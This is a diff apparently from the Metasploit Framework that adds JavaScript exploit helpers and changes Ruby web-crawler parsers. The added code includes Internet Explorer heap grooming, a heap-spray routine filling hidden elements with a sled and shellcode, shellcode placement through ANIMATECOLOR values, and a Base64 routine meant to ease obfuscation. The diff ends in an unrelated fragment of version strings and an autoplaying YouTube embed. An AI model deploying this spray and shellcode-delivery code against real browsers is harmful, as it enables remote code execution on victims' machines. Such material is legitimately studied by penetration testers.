+    //make sure that an HTML DOM element is passed
+    if(!this.element.nodeType || this.element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(!this.element.getAttribute(attr_name))
+        throw "alloc.argument: element does not contain attribute: " + attr_name;
+
+    //make sure the cache is full so the chunk returns the general purpose heap
+    if(!skip_flush)
+        this.Oleaut32FillCache(); 
+
+    this.element.setAttribute(attr_name, null);
+
+    if(!skip_flush)
+        this.Oleaut32EmptyCache()
+}
+
+heapLib2.ie.prototype.Oleaut32FillCache = function()
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.free("cache0x20"+i, true); 
+        this.free("cache0x40"+i, true);
+        this.free("cache0x100"+i, true);
+        this.free("cache0x8000"+i, true);
+    }
+}
+
+heapLib2.ie.prototype.Oleaut32EmptyCache = function() 
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.alloc("cache0x20"+i, 0x20, true); 
+        this.alloc("cache0x40"+i, 0x40, true);
+        this.alloc("cache0x100"+i, 0x100, true);
+        this.alloc("cache0x8000"+i, 0x8000, true);
+    }
+}
@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}
@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}
@@ -0,0 +1,33 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, !!oArg.cb);
+
+  if (oArg.cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { 
+        oArg.cb.apply(this);
+      }
+    };
+
+    xmlHttp.send(oArg.data);
+  }
+  else {
+    xmlHttp.send(oArg.data);
+    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+      return xmlHttp.responseText;
+    }
+
+    return null;
+  }
+
+  return xmlHttp;
+}
@@ -0,0 +1,18 @@
+function postInfo(path, data, cb) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, !!cb);
+
+  if (cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
+    };
+  }
+
+  xmlHttp.send(data);
+  return xmlHttp;
+}
@@ -0,0 +1,15 @@
+if (!window.XMLHTTPRequest) {
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
+    }
+  })();
+}
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};
@@ -1,8 +1,17 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# $Id$
 ##

+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -10,7 +19,10 @@ require 'uri'
 class CrawlerSimple < BaseParser

  def parse(request,result)
-    return unless result['Content-Type'].include?('text/html')
+
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

    # doc = Hpricot(result.body.to_s)
    doc = Nokogiri::HTML(result.body.to_s)
@@ -1,31 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'pathname'
-require 'nokogiri'
-require 'uri'
-
-class CrawlerComments < BaseParser
-
-  def parse(request,result)
-    return unless result['Content-Type'].include?('text/html')
-
-    doc = Nokogiri::HTML(result.body.to_s)
-    doc.xpath('//comment()').each do |comment|
-      # searching for href
-      hr = /href\s*=\s*"([^"]*)"/.match(comment)
-      if hr
-        begin
-          hreq = urltohash('GET', hr[1], request['uri'], nil)
-          insertnewpath(hreq)
-        rescue URI::InvalidURIError
-          # ignored
-        end
-      end
-
-    end
-
-  end
-end
@@ -1,8 +1,17 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# $Id$
 ##

+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -10,21 +19,28 @@ require 'uri'
 class CrawlerForms < BaseParser

  def parse(request,result)
-    return unless result['Content-Type'].include?('text/html')
+
+    if !result['Content-Type'].include? "text/html"
+      return
+    end
+
+    hr = ''
+    m = ''

    doc = Nokogiri::HTML(result.body.to_s)
    doc.css('form').each do |f|
      hr = f['action']

-      # Removed because unused
-      #fname = f['name']
-      #fname = 'NONE' if fname.empty?
+      fname = f['name']
+      fname = "NONE" if fname.empty?

-      m = (f['method'].empty? ? 'GET' : f['method'].upcase)
+      m = f['method'].empty? ? 'GET' : f['method'].upcase
+
+      htmlform = Nokogiri::HTML(f.inner_html)

      arrdata = []

-      f.css('input').each do |p|
+      htmlform.css('input').each do |p|
        arrdata << "#{p['name']}=#{Rex::Text.uri_encode(p['value'])}"
      end

@@ -35,10 +51,7 @@ class CrawlerForms < BaseParser
        hreq['ctype'] = 'application/x-www-form-urlencoded'
        insertnewpath(hreq)
      rescue URI::InvalidURIError
-        #puts "Parse error"
-        #puts "Error: #{link[0]}"
      end
-
    end
  end
 end
@@ -1,8 +1,13 @@
+
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
 ##

+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -22,7 +27,6 @@ class CrawlerFrames < BaseParser
          hreq = urltohash('GET', ir, request['uri'], nil)
          insertnewpath(hreq)
        rescue URI::InvalidURIError
-          # ignored
        end
      end

@@ -1,8 +1,14 @@
+
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
 ##

+# $Revision: 9212 $
+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -21,7 +27,6 @@ class CrawlerImage < BaseParser
          hreq = urltohash('GET', im, request['uri'], nil)
          insertnewpath(hreq)
        rescue URI::InvalidURIError
-          # ignored
        end
      end

@@ -1,8 +1,14 @@
+
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
 ##

+# $Revision: 9212 $
+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -20,7 +26,6 @@ class CrawlerLink < BaseParser
          hreq = urltohash('GET', hr, request['uri'], nil)
          insertnewpath(hreq)
        rescue URI::InvalidURIError
-          # ignored
        end
      end

@@ -1,8 +1,17 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# $Id$
 ##

+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -20,7 +29,6 @@ class CrawlerObjects < BaseParser
        hreq = urltohash('GET', s, request['uri'], nil)
        insertnewpath(hreq)
      rescue URI::InvalidURIError
-        # ignored
      end
    end
  end
@@ -1,8 +1,17 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# $Id$
 ##

+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
+require 'rubygems'
 require 'pathname'
 require 'nokogiri'
 require 'uri'
@@ -12,6 +21,8 @@ class CrawlerScripts < BaseParser
  def parse(request,result)
    return unless result['Content-Type'].include? "text/html"

+    hr = ''
+    m = ''
    doc = Nokogiri::HTML(result.body.to_s)
    doc.xpath("//script").each do |obj|
      s = obj['src']
@@ -19,7 +30,6 @@ class CrawlerScripts < BaseParser
        hreq = urltohash('GET', s, request['uri'], nil)
        insertnewpath(hreq)
      rescue URI::InvalidURIError
-        # ignored
      end
    end

--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .3.3
 .3.1
				`@@ -1 +0,0 @@`
				`<html><body bgcolor="#2F3236"><center><div><iframe width="1280" height="720" src="https://www.youtube.com/embed/wArxEk0Rxhc?autoplay=1" frameborder="0" allowfullscreen></iframe></div></center></body></html>`